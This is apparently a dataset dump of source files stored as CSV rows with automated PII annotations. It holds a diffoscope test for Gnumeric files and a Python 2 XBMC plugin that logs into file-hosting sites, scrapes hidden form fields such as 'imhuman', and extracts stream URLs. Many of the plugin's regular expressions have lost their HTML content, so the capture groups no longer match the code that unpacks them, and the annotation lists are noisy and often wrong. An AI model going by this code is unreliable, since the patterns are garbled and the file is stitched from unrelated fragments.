hr_family_responsibilities()",2456,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2015'], ['PERSON', ""law','Father""], ['PERSON', ""Grandfather','Grandfather""], ['URL', 'http://www.mallconnection.org'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'hr.family.re'], ['URL', 'fields.ch'], ['URL', 'fields.se'], ['URL', 'fields.se'], ['URL', 'fields.ch'], ['URL', 'fields.ma']]"
106,"# -*- coding: utf-8 -*-
#
# diffoscope: in-depth comparison of files, archives, and directories
#
# Copyright © 2018 Chris Lamb dummy@email.com
#
# diffoscope is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# diffoscope is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with diffoscope. If not, see .
import pytest
from diffoscope.comparators.gnumeric import GnumericFile
from ..utils.data import load_fixture, get_data
from ..utils.tools import skip_unless_tools_exist
from ..utils.nonexisting import assert_non_existing
gnumeric1 = load_fixture('test1.gnumeric')
gnumeric2 = load_fixture('test2.gnumeric')
def test_identification(gnumeric1):
assert isinstance(gnumeric1, GnumericFile)
def test_no_differences(gnumeric1):
difference = gnumeric1.compare(gnumeric1)
assert difference is None
@pytest.fixture
def differences(gnumeric1, gnumeric2):
return gnumeric1.compare(gnumeric2).details
@skip_unless_tools_exist('ssconvert')
def test_diff(differences):
expected_diff = get_data('gnumeric_expected_diff')
assert differences[0].unified_diff == expected_diff
@skip_unless_tools_exist('ssconvert')
def test_compare_non_existing(monkeypatch, gnumeric1):
assert_non_existing(monkeypatch, gnumeric1, has_null_source=False)
",1735,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Chris Lamb'], ['PERSON', ""@skip_unless_tools_exist('ssconvert""], ['PERSON', ""@skip_unless_tools_exist('ssconvert""], ['URL', 'https://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'diffoscope.comparators.gn'], ['URL', '..utils.to'], ['URL', '..utils.no'], ['URL', 'test1.gn'], ['URL', 'test2.gn'], ['URL', 'gnumeric1.com'], ['URL', 'pytest.fi'], ['URL', 'gnumeric1.com']]"
107,"'''
xfilesharing XBMC Plugin
Copyright (C) 2013-2014 ddurdle
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see .
'''
import cloudservice
import os
import re
import urllib, urllib2
import cookielib
import xbmc, xbmcaddon, xbmcgui, xbmcplugin
# global variables
PLUGIN_NAME = 'plugin.video.cloudstream'
PLUGIN_URL = 'plugin://'+PLUGIN_NAME+'/'
ADDON = xbmcaddon.Addon(id=PLUGIN_NAME)
# helper methods
def log(msg, err=False):
if err:
xbmc.log(ADDON.getAddonInfo('name') + ': ' + msg, xbmc.LOGERROR)
else:
xbmc.log(ADDON.getAddonInfo('name') + ': ' + msg, xbmc.LOGDEBUG)
#
#
#
class xfilesharing(cloudservice.cloudservice):
# magic numbers
MEDIA_TYPE_VIDEO = 1
MEDIA_TYPE_FOLDER = 0
##
# initialize (setting 1) username, 2) password, 3) authorization token, 4) user agent string
##
def __init__(self, name, domain, user, password, auth, user_agent):
return super(xfilesharing,self).__init__(name, domain, user, password, auth, user_agent)
#return cloudservice.__init__(self,domain, user, password, auth, user_agent)
##
# perform login
##
def login(self):
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar))
# default User-Agent ('Python-urllib/2.6') will *not* work
opener.addheaders = [('User-Agent', self.user_agent)]
if self.domain == 'uptostream.com':
self.domain = 'uptobox.com'
if 'http://' in self.domain:
url = self.domain
else:
url = 'http://' + self.domain + '/'
values = {
'op' : 'login',
'login' : self.user,
'redirect' : url,
'password' : self.password
}
# try login
try:
response = opener.open(url,urllib.urlencode(values))
except urllib2.URLError, e:
if e.code == 403:
#login denied
xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30017))
log(str(e), True)
return
response_data = response.read()
response.close()
loginResult = False
#validate successful login
for r in re.finditer('my_account',
response_data, re.DOTALL):
loginResult = True
#validate successful login
for r in re.finditer('logout',
response_data, re.DOTALL):
loginResult = True
if (loginResult == False):
xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30017))
log('login failed', True)
return
for cookie in self.cookiejar:
for r in re.finditer(' ([^\=]+)\=([^\s]+)\s',
str(cookie), re.DOTALL):
cookieType,cookieValue = r.groups()
if cookieType == 'xfss':
self.auth = cookieValue
if cookieType == 'xfsts':
self.auth = cookieValue
return
##
# return the appropriate ""headers"" for FireDrive requests that include 1) user agent, 2) authorization cookie
# returns: list containing the header
##
def getHeadersList(self,referer=''):
if ((self.auth != '' or self.auth != 0) and referer == ''):
return { 'User-Agent' : self.user_agent, 'Cookie' : 'lang=english; login='+self.user+'; xfsts='+self.auth+'; xfss='+self.auth+';' }
elif (self.auth != '' or self.auth != 0):
return { 'User-Agent' : self.user_agent, 'Referer': referer, 'Cookie' : 'lang=english; login='+self.user+'; xfsts='+self.auth+'; xfss='+self.auth+';' }
else:
return { 'User-Agent' : self.user_agent }
##
# return the appropriate ""headers"" for FireDrive requests that include 1) user agent, 2) authorization cookie
# returns: URL-encoded header string
##
def getHeadersEncoded(self, referer=''):
return urllib.urlencode(self.getHeadersList(referer))
##
# retrieve a list of videos, using playback type stream
# parameters: prompt for video quality (optional), cache type (optional)
# returns: list of videos
##
def getVideosList(self, folderID=0, cacheType=0):
if 'http://' in self.domain:
url = self.domain
else:
url = 'http://' + self.domain
if 'streamcloud.eu' in self.domain:
url = url + '/'
# retrieve all documents
if folderID == 0:
url = url+'?op=my_files'
else:
url = url+'?op=my_files&fld_id='+folderID
videos = {}
if True:
req = urllib2.Request(url, None, self.getHeadersList())
# if action fails, validate login
try:
response = urllib2.urlopen(req)
except urllib2.URLError, e:
if e.code == 403 or e.code == 401:
self.login()
req = urllib2.Request(url, None, self.getHeadersList())
try:
response = urllib2.urlopen(req)
except urllib2.URLError, e:
log(str(e), True)
return
else:
log(str(e), True)
return
response_data = response.read()
response.close()
for r in re.finditer('placeholder\=\""(Username)\"" id\=i\""(nputLoginEmail)\"" name\=\""login\""' ,
response_data, re.DOTALL):
loginUsername,loginUsernameName = r.groups()
self.login()
req = urllib2.Request(url, None, self.getHeadersList())
try:
response = urllib2.urlopen(req)
except urllib2.URLError, e:
log(str(e), True)
return
response_data = response.read()
response.close()
# parsing page for videos
# video-entry
for r in re.finditer('([^\<]+) ' ,
response_data, re.DOTALL):
fileID,url,fileName = r.groups()
# streaming
videos[fileName] = {'url': 'plugin://plugin.video.cloudstream?mode=streamURL&instance='+self.instanceName+'&url=' + url, 'mediaType' : self.MEDIA_TYPE_VIDEO}
for r in re.finditer(' ([^\<]+)' ,
response_data, re.DOTALL):
url,fileName = r.groups()
# streaming
videos[fileName] = {'url': 'plugin://plugin.video.cloudstream?mode=streamURL&instance='+self.instanceName+'&url=' + url, 'mediaType' : self.MEDIA_TYPE_VIDEO}
# video-entry - bestream
for r in re.finditer('[^\<]+([^\<]+) ' ,
response_data, re.DOTALL):
url,fileName = r.groups()
# streaming
videos[fileName] = {'url': 'plugin://plugin.video.cloudstream?mode=streamURL&instance='+self.instanceName+'&url=' + url, 'mediaType' : self.MEDIA_TYPE_VIDEO}
# video-entry - uptobox
for r in re.finditer(' ([^\<]+) ' ,
response_data, re.DOTALL):
url,fileName = r.groups()
# streaming
videos[fileName] = {'url': 'plugin://plugin.video.cloudstream?mode=streamURL&instance='+self.instanceName+'&url=' + url, 'mediaType' : self.MEDIA_TYPE_VIDEO}
if 'realvid.net' in self.domain:
for r in re.finditer('([^\<]+) \s+' ,
response_data, re.DOTALL):
url,fileName = r.groups()
#flatten folders (no clean way of handling subfolders, so just make the root list all folders & subfolders
#therefore, skip listing folders if we're not in root
# if folderID == 0:
# folder-entry
# for r in re.finditer('([^\<]+) ' ,
# folderID = 0
# for r in re.finditer('([^\<]+) ' ,
# response_data, re.DOTALL):
# folderID,folderName = r.groups()
#remove from folderName
# folderName = re.sub('\ \;', '', folderName)
# folder
# if int(folderID) != 0:
# videos[folderName] = {'url': 'plugin://plugin.video.cloudstream?mode=folder&instance='+self.instanceName+'&folderID=' + folderID, 'mediaType' : self.MEDIA_TYPE_FOLDER}
# if folderID == 0:
for r in re.finditer('([^\<]+) ' ,
response_data, re.DOTALL):
folderID,folderName = r.groups()
# folder
if int(folderID) != 0 and folderName != ' . . ':
videos[folderName] = {'url': 'plugin://plugin.video.cloudstream?mode=folder&instance='+self.instanceName+'&folderID=' + folderID, 'mediaType' : self.MEDIA_TYPE_FOLDER}
return videos
##
# retrieve a video link
# parameters: title of video, whether to prompt for quality/format (optional), cache type (optional)
# returns: list of URLs for the video or single URL of video (if not prompting for quality)
##
def getPublicLink(self,url,cacheType=0):
fname = ''
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar))
opener.addheaders = [ ('User-Agent' , self.user_agent)]
req = urllib2.Request(url)
try:
response = opener.open(req)
except urllib2.URLError, e:
pass
response.close()
url = response.url
# opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar), MyHTTPErrorProcessor)
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar))
opener.addheaders = [ ('User-Agent' , self.user_agent), ('Referer', url), ('Cookie', 'lang=english; login='+self.user+'; xfsts='+self.auth+'; xfss='+self.auth+';')]
req = urllib2.Request(url)
# if action fails, validate login
try:
response = opener.open(req)
except urllib2.URLError, e:
if e.code == 403 or e.code == 401:
self.login()
req = urllib2.Request(url, None, self.getHeadersList())
try:
response = opener.open(req)
except urllib2.URLError, e:
log(str(e), True)
return ('','')
else:
log(str(e), True)
return ('','')
response_data = response.read()
response.close()
for r in re.finditer('\([^\<]+)\<',
response_data, re.DOTALL | re.I):
title = r.group(1)
if fname == '':
fname = title
url = response.url
req = urllib2.Request(url)
for r in re.finditer('name\=\""(code)\"" class\=\""(captcha_code)' ,
response_data, re.DOTALL):
loginUsername,loginUsernameName = r.groups()
self.login()
req = urllib2.Request(url, None, self.getHeadersList())
try:
response = urllib2.urlopen(req)
except urllib2.URLError, e:
log(str(e), True)
return ('','')
response_data = response.read()
response.close()
if self.domain == 'vidzi.tv':
for r in re.finditer('(file)\: \""([^\""]+)\.mp4\""' ,response_data, re.DOTALL):
streamType,streamURL = r.groups()
return (streamURL + '.mp4', fname)
confirmID = 0
values = {}
# fetch video title, download URL and docid for stream link
for r in re.finditer(' .*? .*? .*? .*? ' ,response_data, re.DOTALL):
op,usr_login,id,fname,referer = r.groups()
values = {
'op' : op,
'usr_login' : usr_login,
'id' : id,
'fname' : fname,
'referer' : referer,
'method_free' : 'Free Download'
}
for r in re.finditer(' .*? .*? .*? .*? .*? .*? ' ,response_data, re.DOTALL):
op,usr_login,id,fname,referer,hash,submit = r.groups()
values = {
'op' : op,
'usr_login' : usr_login,
'id' : id,
'fname' : fname,
'referer' : referer,
'hash' : hash,
'imhuman' : submit
}
for r in re.finditer(' .*? .*? .*? .*? .*? .*? .*? ' ,response_data, re.DOTALL):
op,usr_login,id,fname,referer,hash,inhu,submit = r.groups()
values = {
'_vhash' : 'i1102394cE',
'gfk' : 'i22abd2449',
'op' : op,
'usr_login' : usr_login,
'id' : id,
'fname' : fname,
'referer' : referer,
'hash' : hash,
'inhu' : inhu,
'imhuman' : submit
}
for r in re.finditer(' .*? .*? .*? ' ,response_data, re.DOTALL):
op,id,referer,submit = r.groups()
values = {
'op' : op,
'id' : id,
'referer' : referer,
'method_free' : submit,
'download_direct' : 1
}
for r in re.finditer(' .*? .*? .*? .*? ' ,response_data, re.DOTALL):
op,id,rand,referer,submit = r.groups()
values = {
'op' : op,
'id' : id,
'rand' : rand,
'referer' : referer,
'method_free' : submit,
'download_direct' : 1
}
for r in re.finditer(' .*? .*? .*? .*? .*? ' ,response_data, re.DOTALL):
ipcount,op,usr_login,id,fname,referer = r.groups()
values = {
'ipcount_val' : ipcount,
'op' : op,
'usr_login' : usr_login,
'id' : id,
'fname' : fname,
'referer' : referer,
'method_free' : 'Slow access'
}
values = {}
variable = 'op'
for r in re.finditer(' ' ,response_data, re.DOTALL):
hidden,value = r.groups()
values[variable] = value
variable = 'usr_login'
for r in re.finditer(' ' ,response_data, re.DOTALL):
hidden,value = r.groups()
values[variable] = value
variable = 'id'
for r in re.finditer(' ' ,response_data, re.DOTALL):
hidden,value = r.groups()
values[variable] = value
variable = 'fname'
for r in re.finditer(' ' ,response_data, re.DOTALL):
hidden,value = r.groups()
values[variable] = value
variable = 'referer'
for r in re.finditer(' ' ,response_data, re.DOTALL):
hidden,value = r.groups()
values[variable] = value
variable = 'hash'
for r in re.finditer(' ' ,response_data, re.DOTALL):
hidden,value = r.groups()
values[variable] = value
variable = 'inhu'
for r in re.finditer(' ' ,response_data, re.DOTALL):
hidden,value = r.groups()
values[variable] = value
variable = 'method_free'
for r in re.finditer(' ' ,response_data, re.DOTALL):
hidden,value = r.groups()
values[variable] = value
variable = 'method_premium'
for r in re.finditer(' ' ,response_data, re.DOTALL):
hidden,value = r.groups()
values[variable] = value
variable = 'rand'
for r in re.finditer(' ' ,response_data, re.DOTALL):
hidden,value = r.groups()
values[variable] = value
variable = 'down_direct'
for r in re.finditer(' ' ,response_data, re.DOTALL):
hidden,value = r.groups()
values[variable] = value
variable = 'file_size_real'
for r in re.finditer(' ' ,response_data, re.DOTALL):
hidden,value = r.groups()
values[variable] = value
variable = 'imhuman'
for r in re.finditer(' ' ,response_data, re.DOTALL):
hidden,value = r.groups()
values[variable] = value
variable = 'gfk'
for r in re.finditer('(name): \''+variable+'\', value: \'([^\']*)\'' ,response_data, re.DOTALL):
hidden,value = r.groups()
values[variable] = value
variable = '_vhash'
for r in re.finditer('(name): \''+variable+'\', value: \'([^\']*)\'' ,response_data, re.DOTALL):
hidden,value = r.groups()
values[variable] = value
# values['referer'] = ''
for r in re.finditer(' .*? .*? .*? .*? .*? ' ,response_data, re.DOTALL):
op,id,rand,referer,plugins,submit = r.groups()
values = {
'op' : op,
'id' : id,
'rand' : rand,
'referer' : referer,
'plugins_are_not_allowed' : plugins,
'method_free' : submit,
'download_direct' : 1
}
# req = urllib2.Request(url, urllib.urlencode(values), self.getHeadersList(url))
req = urllib2.Request(url)
if self.domain == 'thefile.me':
values['method_free'] = 'Free Download'
elif self.domain == 'sharesix.com':
values['method_free'] = 'Free'
elif 'streamcloud.eu' in self.domain:
xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30037) + str(10))
xbmc.sleep((int(10)+1)*1000)
elif self.domain == 'vidhog.com':
xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30037) + str(15))
xbmc.sleep((int(15)+1)*1000)
elif self.domain == 'vidto.me':
xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30037) + str(6))
xbmc.sleep((int(6)+1)*1000)
elif self.domain == 'vodlocker.com':
xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30037) + str(3))
xbmc.sleep((int(3)+1)*1000)
elif self.domain == 'hcbit.com':
try:
# response = urllib2.urlopen(req)
response = opener.open(req, urllib.urlencode(values))
except urllib2.URLError, e:
if e.code == 403 or e.code == 401:
self.login()
try:
response = opener.open(req, urllib.urlencode(values))
except urllib2.URLError, e:
log(str(e), True)
return ('', '')
else:
log(str(e), True)
return ('', '')
try:
if response.info().getheader('Location') != '':
return (response.info().getheader('Location') + '|' + self.getHeadersEncoded(url), fname)
except:
for r in re.finditer('\'(file)\'\,\'([^\']+)\'' ,response_data, re.DOTALL):
streamType,streamURL = r.groups()
return (streamURL + '|' + self.getHeadersEncoded(url), fname)
for r in re.finditer('\([^\<]+)\<\/td\>' ,response_data, re.DOTALL):
deliminator,fileName = r.groups()
for r in re.finditer('(\|)([^\|]{42})\|' ,response_data, re.DOTALL):
deliminator,fileID = r.groups()
streamURL = 'http://cloud1.hcbit.com/cgi-bin/dl.cgi/'+fileID+'/'+fileName
return (streamURL + '|' + self.getHeadersEncoded(url), fname)
if self.domain == 'bestreams.net':
file_id = ''
aff = ''
variable = 'file_id'
for r in re.finditer('\''+variable+'\', (\')([^\']*)\'' ,response_data, re.DOTALL):
hidden,value = r.groups()
file_id = value
variable = 'aff'
for r in re.finditer('\''+variable+'\', (\')([^\']*)\'' ,response_data, re.DOTALL):
hidden,value = r.groups()
aff = value
xbmc.sleep((int(2)+1)*1000)
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar))
opener.addheaders = [ ('User-Agent' , self.user_agent), ('Referer', url), ('Cookie', 'lang=1; file_id='+file_id+'; aff='+aff+';')]
elif self.domain == 'thevideo.me':
for r in re.finditer('\,\s+\'file\'\s+\:\s+\'([^\']+)\'',
response_data, re.DOTALL):
streamURL = r.group(1)
return (streamURL,fname)
elif self.domain == 'vidzi.tv':
for r in re.finditer('\s+file:\s+\""([^\""]+)\""',
response_data, re.DOTALL):
streamURL = r.group(1)
return (streamURL,fname)
# if action fails, validate login
try:
# response = urllib2.urlopen(req)
response = opener.open(req, urllib.urlencode(values))
except urllib2.URLError, e:
if e.code == 403 or e.code == 401:
self.login()
try:
response = opener.open(req, urllib.urlencode(values))
except urllib2.URLError, e:
log(str(e), True)
return ('','')
else:
log(str(e), True)
return ('','')
response_data = response.read()
response.close()
op=''
for r in re.finditer(' .*? .*? .*? .*? ' ,response_data, re.DOTALL):
op,id,rand,referer,submit = r.groups()
values = {
'op' : op,
'id' : id,
'rand' : rand,
'referer' : referer,
'method_free' : submit,
'download_direct' : 1
}
streamURL=''
title = ''
for r in re.finditer('\<(title)\>([^\>]*)\<\/title\>' ,response_data, re.DOTALL):
titleID,title = r.groups()
# for thefile
if self.domain == 'thefile.me':
downloadAddress = ''
for r in re.finditer('\<(img) src\=\""http\:\/\/([^\/]+)\/[^\""]+\"" style' ,response_data, re.DOTALL):
downloadTag,downloadAddress = r.groups()
for r in re.finditer('(\|)([^\|]{56})\|' ,response_data, re.DOTALL):
deliminator,fileID = r.groups()
streamURL = 'http://'+str(downloadAddress)+'/d/'+fileID+'/video.mp4'
elif self.domain == 'sharerepo.com':
for r in re.finditer('(file)\: \'([^\']+)\'\,' ,response_data, re.DOTALL):
streamType,streamURL = r.groups()
for r in re.finditer('(\|)([^\|]{60})\|' ,response_data, re.DOTALL):
deliminator,fileID = r.groups()
streamURL = 'http://37.48.80.43/d/'+fileID+'/video.mp4?start=0'
elif self.domain == 'filenuke.com':
for r in re.finditer('(\|)([^\|]{56})\|' ,response_data, re.DOTALL):
deliminator,fileID = r.groups()
streamURL = 'http://37.252.3.244/d/'+fileID+'/video.flv?start=0'
elif self.domain == 'sharerepo.com':
for r in re.finditer('(file)\: \'([^\']+)\'\,' ,response_data, re.DOTALL):
streamType,streamURL = r.groups()
elif self.domain == 'letwatch.us':
for r in re.finditer('\[IMG\]http://([^\/]+)\/',
response_data, re.DOTALL):
IP = r.group(1)
for r in re.finditer('\|([^\|]{60})\|',
response_data, re.DOTALL):
fileID = r.group(1)
streamURL = 'http://'+IP+'/'+fileID+'/v.flv'
elif self.domain == 'thevideo.me':
for r in re.finditer('\,\s+\'file\'\s+\:\s+\'([^\']+)\'',
response_data, re.DOTALL):
streamURL = r.group(1)
elif self.domain == 'vidto.me':
for r in re.finditer('var file_link = \'([^\']+)\'',
response_data, re.DOTALL):
streamURL = r.group(1)
elif self.domain == 'allmyvideos.net':
for r in re.finditer('\""file\"" : \""([^\""]+)\""',
response_data, re.DOTALL):
streamURL = r.group(1)
elif self.domain == 'realvid.net':
for r in re.finditer('file:\s?\'([^\']+)\'',
response_data, re.DOTALL):
streamURL = r.group(1)
elif self.domain == 'uptobox.com' or self.domain == 'uptostream.com':
for r in re.finditer('\\s+\',
response_data, re.DOTALL):
streamURL = r.group(1)
return (streamURL, fname)
for r in re.finditer('\(\d+) seconds' ,response_data, re.DOTALL):
id,timeout = r.groups()
for r in re.finditer('
(.*?) ' ,response_data, re.DOTALL):
id,error = r.groups()
xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), error)
return ('','')
req = urllib2.Request(url)
if timeout > 0:
xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30037) + str(timeout))
xbmc.sleep((int(timeout)+1)*1000)
# if action fails, validate login
try:
response = opener.open(req, urllib.urlencode(values))
except urllib2.URLError, e:
if e.code == 403 or e.code == 401:
self.login()
try:
response = opener.open(req, urllib.urlencode(values))
except urllib2.URLError, e:
log(str(e), True)
return ('','')
else:
log(str(e), True)
return ('','')
response_data = response.read()
response.close()
for r in re.finditer('(Click here to start your download) ' ,response_data, re.DOTALL):
streamURL,downloadlink = r.groups()
#vodlocker.com
if streamURL == '':
# fetch video title, download URL and docid for stream link
for r in re.finditer('(file)\: \""([^\""]+)""\,' ,response_data, re.DOTALL):
streamType,streamURL = r.groups()
if 'mp4' in streamURL:
break
# mightyupload.com
if streamURL == '':
# fetch video title, download URL and docid for stream link
for r in re.finditer('var (file_link) = \'([^\']+)\'' ,response_data, re.DOTALL):
streamType,streamURL = r.groups()
# vidhog.com
if streamURL == '':
# fetch video title, download URL and docid for stream link
for r in re.finditer('(product_download_url)=([^\']+)\'' ,response_data, re.DOTALL):
streamType,streamURL = r.groups()
# vidspot.net
if streamURL == '':
# fetch video title, download URL and docid for stream link
for r in re.finditer('""(file)"" : ""([^\""]+)""\,' ,response_data, re.DOTALL):
streamType,streamURL = r.groups()
# uploadc.com
if streamURL == '':
# fetch video title, download URL and docid for stream link
for r in re.finditer('\'(file)\',\'([^\']+)\'\)\;' ,response_data, re.DOTALL):
streamType,streamURL = r.groups()
streamURL = streamURL + '|' + self.getHeadersEncoded(url)
# return 'http://93.120.27.PI:KEY.mp4'
return (streamURL, fname)
class MyHTTPErrorProcessor(urllib2.HTTPErrorProcessor):
def http_response(self, request, response):
code, msg, hdrs = response.code, response.msg, response.info()
# only add this line to stop 302 redirection.
if code == 302: return response
if not (200 <= code < 300):
response = self.parent.error(
'http', request, response, code, msg, hdrs)
return response
https_response = http_response
",33648,"[['URL', ""http://cloud1.hcbit.com/cgi-bin/dl.cgi/'+fileID+'/'+fileName""], ['DATE_TIME', '2013-2014'], ['LOCATION', 'xbmcaddon'], ['LOCATION', 'xbmcgui'], ['URL', 'xbmcaddon.Ad'], ['PERSON', 'LOGERROR'], ['PERSON', 'LOGDEBUG'], ['PERSON', 'MEDIA_TYPE_VIDEO'], ['URL', 'urllib2.HT'], ['URL', 'self.co'], ['URL', 'opener.ad'], ['URL', 'self.do'], ['URL', 'self.do'], ['PERSON', 'self.user'], ['URL', 'self.pa'], ['URL', 'e.co'], ['PERSON', 're.finditer'], ['PERSON', 'FireDrive'], ['PERSON', 'Referer'], ['PERSON', 'FireDrive'], ['LOCATION', 'getHeadersEncoded(self'], ['URL', 'self.ge'], ['URL', 'self.do'], ['URL', 'self.do'], ['URL', 'streamcloud.eu'], ['URL', 'urllib2.Re'], ['URL', 'self.ge'], ['URL', 'e.co'], ['URL', 'urllib2.Re'], ['URL', 'self.ge'], ['URL', 'urllib2.Re'], ['URL', 'self.ge'], ['URL', 'r.gr'], ['URL', 'plugin.video.cl'], ['URL', 'self.in'], ['URL', 'self.ME'], ['URL', 'r.gr'], ['URL', 'plugin.video.cl'], ['URL', 'self.in'], ['URL', 'self.ME'], ['URL', 'r.gr'], ['URL', 'plugin.video.cl'], ['URL', 'self.in'], ['URL', 'self.ME'], ['URL', 'r.gr'], ['URL', 'plugin.video.cl'], ['URL', 'self.in'], ['URL', 'self.ME'], ['URL', 'realvid.net'], ['URL', 'r.gr'], ['URL', 'plugin.video.cl'], ['URL', 'self.in'], ['URL', 'self.ME'], ['URL', 'plugin.video.cl'], ['URL', 'self.in'], ['URL', 'self.ME'], ['URL', 'urllib2.HT'], ['URL', 'self.co'], ['URL', 'opener.ad'], ['URL', 'urllib2.Re'], ['URL', 'response.cl'], ['URL', 'urllib2.HT'], ['URL', 'self.co'], ['URL', 'urllib2.HT'], ['URL', 'self.co'], ['URL', 'opener.ad'], ['PERSON', 'Referer'], ['URL', 'self.us'], ['URL', 'urllib2.Re'], ['URL', 'e.co'], ['URL', 'urllib2.Re'], ['URL', 'self.ge'], ['URL', 'urllib2.Re'], ['URL', 're.fi'], ['URL', 'urllib2.Re'], ['URL', 'self.ge'], ['URL', 'r.gr'], ['PERSON', 'fname'], ['URL', 're.fi'], ['LOCATION', 'fname'], ['LOCATION', 'fname'], ['PERSON', 'imhuman'], ['LOCATION', 'fname'], ['PERSON', 'imhuman'], ['LOCATION', 'fname'], ['PERSON', 'inhu'], ['PERSON', 'imhuman'], ['URL', 'urllib2.Re'], ['LOCATION', 'self.getHeadersList(url'], ['URL', 'self.ge'], ['URL', 'urllib2.Re'], ['URL', 'self.do'], ['URL', 'thefile.me'], ['URL', 'e.co'], ['URL', 'self.ge'], ['URL', 're.fi'], ['URL', 'r.gr'], ['URL', 'self.ge'], ['PERSON', 'fname'], ['URL', 're.fi'], ['LOCATION', ""re.finditer('(\\|)([^\\|]{42})\\|""], ['URL', 'self.ge'], ['PERSON', 'fname'], ['URL', 'self.do'], ['NRP', 'file_id'], ['LOCATION', ""re.finditer('\\''+variable+'\\""], ['NRP', 'file_id'], ['LOCATION', ""re.finditer('\\''+variable+'\\""], ['URL', 'urllib2.HT'], ['URL', 'self.co'], ['URL', 'opener.ad'], ['PERSON', 'Referer'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 'r.gr'], ['URL', 'e.co'], ['DATE_TIME', ""re.finditer('\\<(title)\\>([^\\>]*)\\<\\/title\\""], ['URL', 'video.mp'], ['URL', 'self.do'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 'video.mp'], ['URL', 'self.do'], ['URL', 'self.do'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 'self.do'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 'r.gr'], ['URL', 're.fi'], ['PERSON', 'strong>(\\d+) seconds\''], ['URL', 'urllib2.Re'], ['URL', 'e.co'], ['URL', 'r.gr'], ['URL', 'vodlocker.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'mightyupload.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'vidhog.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'vidspot.net'], ['URL', 're.fi'], ['LOCATION', '^\\""]+)""\\'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'uploadc.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'self.ge'], ['URL', 'KEY.mp'], ['URL', 'urllib2.HT'], ['URL', 'http://www.gnu.org/licenses/'], ['IP_ADDRESS', '37.48.80.43'], ['IP_ADDRESS', '37.252.3.244'], ['URL', 'plugin.video.cl'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'cloudservice.cl'], ['URL', 'self.us'], ['URL', 'self.do'], ['URL', 'uptostream.com'], ['URL', 'self.do'], ['URL', 'uptobox.com'], ['URL', 'self.do'], ['URL', 'self.us'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'response.re'], ['URL', 'response.cl'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'self.co'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.us'], ['URL', 'self.us'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.us'], ['URL', 'self.us'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.us'], ['URL', 'self.do'], ['URL', 'self.do'], ['URL', 'e.co'], ['URL', 'response.re'], ['URL', 'response.cl'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'response.re'], ['URL', 'response.cl'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'self.do'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.fi'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.su'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'self.us'], ['URL', 'self.us'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'e.co'], ['URL', 'response.re'], ['URL', 'response.cl'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'response.re'], ['URL', 'response.cl'], 